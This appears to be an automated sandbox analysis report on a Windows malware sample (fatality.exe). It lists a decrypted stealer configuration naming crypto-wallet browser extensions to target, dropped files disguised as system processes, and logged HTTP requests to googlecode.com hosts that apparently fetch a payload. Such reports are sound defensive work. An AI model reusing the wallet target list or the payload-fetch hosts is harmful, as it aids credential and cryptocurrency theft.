                                      Source: 0000000D.00000002.1915424378.000000001346B000.00000004.00000800.00020000.00000000.sdmpString decryptor: {"0":[],"2a025748-b498-4ae9-8f8c-b763dd8b5ffc":{"_0":"Full","_1":"False","_2":"False","_3":"False"},"31395ecd-4eed-48b9-a47f-81dbcc84ccdf":{"_0":"True","_1":"nkbihfbeogaeaoehlefnkodbefgpgknn:MetaMask\nejbalbakoplchlghecdalmeeeajnimhm:MetaMask\nibnejdfjmmkpcnlpebklmnkoeoihofec:TronLink\nfnjhmkhhmkbjkkabndcnnogagogbneec:Ronin\nkjmoohlgokccodicjjfebfomlbljgfhk:Ronin\nfhbohimaelbohpjbbldcngcnapndodjp:BinanceChain\nbfnaelmomeimhlpmgjnjophhpkkoljpa:Phantom\nnphplpgoakhhjchkkhmiggakijnkhfnd:TONWeb\nffnbelfdoeiohenkjibnmadjiehjhajb:Yoroi\nakoiaibnepcedcplijmiamnaigbepmcb:Yoroi\nafbcbjpbpfadlkmhmclhkeeodmamcflc:MathWallet\nhnfanknocfeofbddgcijnmhnfnkdnaad:Coinbase\nimloifkgjagghnncjkhggdhalmcnfklk:TrezorPM\nilgcnhelpchnceeipipijaljkblbcobl:GAuth\noeljdldpnmdbchonielidgobddffflal:EOS\ncjelfplplebdjjenllpjcblmjkfcffne:JaxxLiberty\nlgmpcpglpngdoalbgeoldeajfclnhafa:SafePal\naholpfdialjgjfhomihkjbmgjidlcdno:Exodus","_2":"All Users","_3":"True"}}
                                      Source: 0000000D.00000002.1915424378.000000001346B000.00000004.00000800.00020000.00000000.sdmpString decryptor: ["bj0UKX3O1fsx9BYPGXoKHqjvLayVva1jN63FIaBpzhY4ZE1D43om8NOuAFJtihcbnIkDHSHpW8UjRpWHjvb2vPk9sIFCRRHSF7QQdy5lw8PA2odUtBKwGkpYhlU9MEYF","DCR_MUTEX-KNZ6qT1z1KAE3Pr0GoKV","0","","","5","2","WyIxIiwiIiwiNSJd","WyIxIiwiV3lJaUxDSWlMQ0psZVVsM1NXcHZhV1V4VGxwVk1WSkdWRlZTVTFOV1drWm1VemxXWXpKV2VXTjVPR2xNUTBsNFNXcHZhVnB0Um5Oak1sVnBURU5KZVVscWIybGFiVVp6WXpKVmFVeERTWHBKYW05cFpFaEtNVnBUU1hOSmFsRnBUMmxLTUdOdVZteEphWGRwVGxOSk5rbHVVbmxrVjFWcFRFTkpNa2xxYjJsa1NFb3hXbE5KYzBscVkybFBhVXB0V1ZkNGVscFRTWE5KYW1kcFQybEtNR051Vm14SmFYZHBUMU5KTmtsdVVubGtWMVZwVEVOSmVFMURTVFpKYmxKNVpGZFZhVXhEU1hoTlUwazJTVzVTZVdSWFZXbE1RMGw0VFdsSk5rbHVVbmxrVjFWcFRFTkplRTE1U1RaSmJsSjVaRmRWYVV4RFNYaE9RMGsyU1c1U2VXUlhWV2xtVVQwOUlsMD0iXQ=="]

                                      Compliance

                                      Source: C:\blockcomSession\containerReview.exe Unpacked PE file: 13.2.containerReview.exe.3250000.5.unpack
                                      Source: fatality.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                      Source: C:\blockcomSession\containerReview.exe Directory created: C:\Program Files\Mozilla Firefox\fonts\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe
                                      Source: C:\blockcomSession\containerReview.exe Directory created: C:\Program Files\Mozilla Firefox\fonts\c0a39dc94da3cf
                                      Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: fatality.exe, fatality.exe, 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp
                                      Source: Binary string: 7C:\Users\user\AppData\Local\Temp\0hr0ztmo\0hr0ztmo.pdb source: containerReview.exe, 0000000D.00000002.1906268968.0000000003BB0000.00000004.00000800.00020000.00000000.sdmp

                                      Spreading

                                      Source: Yara match File source: fatality.exe, type: SAMPLE
                                      Source: Yara match File source: 2.0.icsys.icn.exe.400000.0.unpack, type: UNPACKEDPE
                                      Source: Yara match File source: 0.2.fatality.exe.400000.0.unpack, type: UNPACKEDPE
                                      Source: Yara match File source: 14.2.explorer.exe.400000.0.unpack, type: UNPACKEDPE
                                      Source: Yara match File source: 14.0.explorer.exe.400000.0.unpack, type: UNPACKEDPE
                                      Source: Yara match File source: 4.2.spoolsv.exe.400000.0.unpack, type: UNPACKEDPE
                                      Source: Yara match File source: 7.2.spoolsv.exe.400000.0.unpack, type: UNPACKEDPE
                                      Source: Yara match File source: 8.2.explorer.exe.400000.0.unpack, type: UNPACKEDPE
                                      Source: Yara match File source: 2.2.icsys.icn.exe.400000.0.unpack, type: UNPACKEDPE
                                      Source: Yara match File source: 7.0.spoolsv.exe.400000.0.unpack, type: UNPACKEDPE
                                      Source: Yara match File source: 8.0.explorer.exe.400000.0.unpack, type: UNPACKEDPE
                                      Source: Yara match File source: 3.2.explorer.exe.400000.0.unpack, type: UNPACKEDPE
                                      Source: Yara match File source: 0.0.fatality.exe.400000.0.unpack, type: UNPACKEDPE
                                      Source: Yara match File source: 5.0.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                                      Source: Yara match File source: 4.0.spoolsv.exe.400000.0.unpack, type: UNPACKEDPE
                                      Source: Yara match File source: 3.0.explorer.exe.400000.0.unpack, type: UNPACKEDPE
                                      Source: Yara match File source: Process Memory Space: fatality.exe PID: 7440, type: MEMORYSTR
                                      Source: Yara match File source: Process Memory Space: icsys.icn.exe PID: 7488, type: MEMORYSTR
                                      Source: Yara match File source: Process Memory Space: explorer.exe PID: 7540, type: MEMORYSTR
                                      Source: Yara match File source: Process Memory Space: spoolsv.exe PID: 7560, type: MEMORYSTR
                                      Source: Yara match File source: Process Memory Space: svchost.exe PID: 7592, type: MEMORYSTR
                                      Source: Yara match File source: Process Memory Space: spoolsv.exe PID: 7644, type: MEMORYSTR
                                      Source: Yara match File source: Process Memory Space: explorer.exe PID: 7752, type: MEMORYSTR
                                      Source: Yara match File source: Process Memory Space: explorer.exe PID: 7892, type: MEMORYSTR
                                      Source: Yara match File source: C:\Windows\Resources\Themes\icsys.icn.exe, type: DROPPED
                                      Source: Yara match File source: C:\Windows\Resources\svchost.exe, type: DROPPED
                                      Source: Yara match File source: C:\Windows\Resources\spoolsv.exe, type: DROPPED
                                      Source: Yara match File source: C:\Windows\Resources\Themes\explorer.exe, type: DROPPED
                                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe System file written: C:\Windows\System32\SecurityHealthSystray.exe
                                      Source: C:\Users\user\Desktop\fatality.exe Code function: 1_2_008EA69B FindFirstFileW,FindFirstFileW,1_2_008EA69B
                                      Source: C:\blockcomSession\containerReview.exe File opened: C:\Users\user
                                      Source: C:\blockcomSession\containerReview.exe File opened: C:\Users\user\Documents\desktop.ini
                                      Source: C:\blockcomSession\containerReview.exe File opened: C:\Users\user\AppData
                                      Source: C:\blockcomSession\containerReview.exe File opened: C:\Users\user\AppData\Local\Temp
                                      Source: C:\blockcomSession\containerReview.exe File opened: C:\Users\user\Desktop\desktop.ini
                                      Source: C:\blockcomSession\containerReview.exe File opened: C:\Users\user\AppData\Local

                                      Networking

                                      Source: C:\Windows\Resources\Themes\explorer.exe Network Connect: 74.125.133.82 80
                                      Source: C:\Windows\Resources\Themes\explorer.exe Network Connect: 64.233.167.82 80
                                      Source: C:\Windows\Resources\Themes\explorer.exe Network Connect: 66.102.1.82 80
                                      Source: global traffic TCP traffic: 192.168.2.4:56638 -> 1.1.1.1:53
                                      Source: global traffic HTTP traffic detected: GET /files/tjcm.gif HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko Host: codecmd01.googlecode.com Connection: Keep-Alive
                                      Source: global traffic HTTP traffic detected: GET /files/tjcm.gif HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko Host: codecmd02.googlecode.com Connection: Keep-Alive
                                      Source: global traffic HTTP traffic detected: GET /files/tjcm.gif HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko Host: codecmd03.googlecode.com Connection: Keep-Alive
                                      Source: unknown TCP traffic detected without corresponding DNS query: 1.1.1.1
                                      Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                                      Source: global traffic | DNS traffic detected: DNS query: codecmd01.googlecode.com
                                      Source: global traffic | DNS traffic detected: DNS query: codecmd02.googlecode.com
                                      Source: global traffic | DNS traffic detected: DNS query: codecmd03.googlecode.com
                                      Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Content-Type: text/html; charset=UTF-8 | Referrer-Policy: no-referrer | Content-Length: 1575 | Date: Mon, 13 Jan 2025 12:17:10 GMT
                                      Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Content-Type: text/html; charset=UTF-8 | Referrer-Policy: no-referrer | Content-Length: 1575 | Date: Mon, 13 Jan 2025 12:17:13 GMT
                                      Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Content-Type: text/html; charset=UTF-8 | Referrer-Policy: no-referrer | Content-Length: 1575 | Date: Mon, 13 Jan 2025 12:17:15 GMT
                                      Source: global traffic. HTTP traffic detected: HTTP/1.1 404 Not Found | Content-Type: text/html; charset=UTF-8 | Referrer-Policy: no-referrer | Content-Length: 1575 | Date: Mon, 13 Jan 2025 12:17:17 GMT
                                      Source: global traffic. HTTP traffic detected: HTTP/1.1 404 Not Found | Content-Type: text/html; charset=UTF-8 | Referrer-Policy: no-referrer | Content-Length: 1575 | Date: Mon, 13 Jan 2025 12:17:19 GMT
                                      Source: global traffic. HTTP traffic detected: HTTP/1.1 404 Not Found | Content-Type: text/html; charset=UTF-8 | Referrer-Policy: no-referrer | Content-Length: 1575 | Date: Mon, 13 Jan 2025 12:17:19 GMT
                                      Source: global traffic. HTTP traffic detected: HTTP/1.1 404 Not Found | Content-Type: text/html; charset=UTF-8 | Referrer-Policy: no-referrer | Content-Length: 1575 | Date: Mon, 13 Jan 2025 12:17:19 GMT
                                      Source: global traffic. HTTP traffic detected: HTTP/1.1 404 Not Found | Content-Type: text/html; charset=UTF-8 | Referrer-Policy: no-referrer | Content-Length: 1575 | Date: Mon, 13 Jan 2025 12:17:22 GMT
                                      Source: global traffic. HTTP traffic detected: HTTP/1.1 404 Not Found | Content-Type: text/html; charset=UTF-8 | Referrer-Policy: no-referrer | Content-Length: 1575 | Date: Mon, 13 Jan 2025 12:17:24 GMT
                                      Source: global traffic. HTTP traffic detected: HTTP/1.1 404 Not Found | Content-Type: text/html; charset=UTF-8 | Referrer-Policy: no-referrer | Content-Length: 1575 | Date: Mon, 13 Jan 2025 12:17:26 GMT
                                      Source: global traffic. HTTP traffic detected: HTTP/1.1 404 Not Found | Content-Type: text/html; charset=UTF-8 | Referrer-Policy: no-referrer | Content-Length: 1575 | Date: Mon, 13 Jan 2025 12:17:28 GMT
                                      Source: global traffic. HTTP traffic detected: HTTP/1.1 404 Not Found | Content-Type: text/html; charset=UTF-8 | Referrer-Policy: no-referrer | Content-Length: 1575 | Date: Mon, 13 Jan 2025 12:17:30 GMT
                                      Source: global traffic. HTTP traffic detected: HTTP/1.1 404 Not Found | Content-Type: text/html; charset=UTF-8 | Referrer-Policy: no-referrer | Content-Length: 1575 | Date: Mon, 13 Jan 2025 12:17:32 GMT
                                      Source: global traffic. HTTP traffic detected: HTTP/1.1 404 Not Found | Content-Type: text/html; charset=UTF-8 | Referrer-Policy: no-referrer | Content-Length: 1575 | Date: Mon, 13 Jan 2025 12:17:34 GMT
                                      Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1575 Date: Mon, 13 Jan 2025 12:17:36 GMT
                                      Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1575 Date: Mon, 13 Jan 2025 12:17:38 GMT
                                      Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1575 Date: Mon, 13 Jan 2025 12:17:40 GMT
                                      Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1575 Date: Mon, 13 Jan 2025 12:17:43 GMT
                                      Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1575 Date: Mon, 13 Jan 2025 12:17:45 GMT
                                      Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1575 Date: Mon, 13 Jan 2025 12:17:47 GMT
                                      Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1575 Date: Mon, 13 Jan 2025 12:17:49 GMT
                                      Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1575 Date: Mon, 13 Jan 2025 12:17:51 GMT
                                      Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1575 Date: Mon, 13 Jan 2025 12:17:53 GMT
                                      Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1575 Date: Mon, 13 Jan 2025 12:17:54 GMT
                                      Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1575 Date: Mon, 13 Jan 2025 12:17:56 GMT
                                      Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1575 Date: Mon, 13 Jan 2025 12:17:58 GMT
                                      Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1575 Date: Mon, 13 Jan 2025 12:17:59 GMT
                                      Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1575 Date: Mon, 13 Jan 2025 12:18:01 GMT
                                      Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1575 Date: Mon, 13 Jan 2025 12:18:03 GMT
                                      Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1575 Date: Mon, 13 Jan 2025 12:18:04 GMT
                                      Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1575 Date: Mon, 13 Jan 2025 12:18:06 GMT
                                      Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1575 Date: Mon, 13 Jan 2025 12:18:07 GMT
                                      Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1575 Date: Mon, 13 Jan 2025 12:18:09 GMT
                                      Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1575 Date: Mon, 13 Jan 2025 12:18:10 GMT
                                      Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1575 Date: Mon, 13 Jan 2025 12:18:11 GMT
                                      Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1575 Date: Mon, 13 Jan 2025 12:18:13 GMT
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1575 Date: Mon, 13 Jan 2025 12:18:14 GMT
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1575 Date: Mon, 13 Jan 2025 12:18:15 GMT
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1575 Date: Mon, 13 Jan 2025 12:18:17 GMT
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1575 Date: Mon, 13 Jan 2025 12:18:18 GMT
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1575 Date: Mon, 13 Jan 2025 12:18:19 GMT
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1575 Date: Mon, 13 Jan 2025 12:18:21 GMT
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1575 Date: Mon, 13 Jan 2025 12:18:22 GMT
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1575 Date: Mon, 13 Jan 2025 12:18:23 GMT
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1575 Date: Mon, 13 Jan 2025 12:18:25 GMT
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1575 Date: Mon, 13 Jan 2025 12:18:26 GMT
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1575 Date: Mon, 13 Jan 2025 12:18:27 GMT
                                      Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1575 Date: Mon, 13 Jan 2025 12:18:28 GMT
                                      Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1575 Date: Mon, 13 Jan 2025 12:18:30 GMT
                                      Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1575 Date: Mon, 13 Jan 2025 12:18:31 GMT
                                      Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1575 Date: Mon, 13 Jan 2025 12:18:32 GMT
                                      Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1575 Date: Mon, 13 Jan 2025 12:18:33 GMT
                                      Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1575 Date: Mon, 13 Jan 2025 12:18:33 GMT
                                      Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1575 Date: Mon, 13 Jan 2025 12:18:33 GMT
                                      Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1575 Date: Mon, 13 Jan 2025 12:18:35 GMT
                                      Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1575 Date: Mon, 13 Jan 2025 12:18:37 GMT
                                      Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1575 Date: Mon, 13 Jan 2025 12:18:38 GMT
                                      Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1575 Date: Mon, 13 Jan 2025 12:18:39 GMT
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Content-Type: text/html; charset=UTF-8 | Referrer-Policy: no-referrer | Content-Length: 1575 | Date: Mon, 13 Jan 2025 12:18:40 GMT
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Content-Type: text/html; charset=UTF-8 | Referrer-Policy: no-referrer | Content-Length: 1575 | Date: Mon, 13 Jan 2025 12:18:41 GMT
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Content-Type: text/html; charset=UTF-8 | Referrer-Policy: no-referrer | Content-Length: 1575 | Date: Mon, 13 Jan 2025 12:18:42 GMT
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Content-Type: text/html; charset=UTF-8 | Referrer-Policy: no-referrer | Content-Length: 1575 | Date: Mon, 13 Jan 2025 12:18:44 GMT
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Content-Type: text/html; charset=UTF-8 | Referrer-Policy: no-referrer | Content-Length: 1575 | Date: Mon, 13 Jan 2025 12:18:45 GMT
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Content-Type: text/html; charset=UTF-8 | Referrer-Policy: no-referrer | Content-Length: 1575 | Date: Mon, 13 Jan 2025 12:18:46 GMT
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Content-Type: text/html; charset=UTF-8 | Referrer-Policy: no-referrer | Content-Length: 1575 | Date: Mon, 13 Jan 2025 12:18:47 GMT
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Content-Type: text/html; charset=UTF-8 | Referrer-Policy: no-referrer | Content-Length: 1575 | Date: Mon, 13 Jan 2025 12:18:49 GMT
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Content-Type: text/html; charset=UTF-8 | Referrer-Policy: no-referrer | Content-Length: 1575 | Date: Mon, 13 Jan 2025 12:18:50 GMT
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Content-Type: text/html; charset=UTF-8 | Referrer-Policy: no-referrer | Content-Length: 1575 | Date: Mon, 13 Jan 2025 12:18:51 GMT
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Content-Type: text/html; charset=UTF-8 | Referrer-Policy: no-referrer | Content-Length: 1575 | Date: Mon, 13 Jan 2025 12:18:52 GMT
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1575 Date: Mon, 13 Jan 2025 12:18:53 GMT
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1575 Date: Mon, 13 Jan 2025 12:18:54 GMT
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1575 Date: Mon, 13 Jan 2025 12:18:55 GMT
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1575 Date: Mon, 13 Jan 2025 12:18:57 GMT
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1575 Date: Mon, 13 Jan 2025 12:18:58 GMT
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1575 Date: Mon, 13 Jan 2025 12:18:59 GMT
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1575 Date: Mon, 13 Jan 2025 12:19:00 GMT
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1575 Date: Mon, 13 Jan 2025 12:19:01 GMT
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1575 Date: Mon, 13 Jan 2025 12:19:02 GMT
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1575 Date: Mon, 13 Jan 2025 12:19:03 GMT
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1575 Date: Mon, 13 Jan 2025 12:19:05 GMT
                                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 13 Jan 2025 12:19:06 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 
